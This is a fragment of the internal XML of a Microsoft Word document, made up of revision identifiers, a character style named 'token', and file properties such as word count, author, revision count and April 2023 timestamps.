    <w:rsid w:val="00912FB4"/>
    <w:rsid w:val="009D38B4"/>
    <w:rsid w:val="00A15D9E"/>
    <w:rsid w:val="00AB31F6"/>
    <w:rsid w:val="00B257B4"/>
    <w:rsid w:val="00C41C1E"/>
    <w:rsid w:val="00C47276"/>
    <w:rsid w:val="00D20B54"/>
    <w:rsid w:val="00F75C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21FDCAE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BF6EE5E5-8B81-0444-9DC0-69F8C6DBBD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6618F6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6618F6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009D38B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19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66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214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7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025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05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53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5</Pages>
  <Words>327</Words>
  <Characters>1864</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>15</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2187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geng yuan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>geng yuan</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-08T13:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-11T05:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>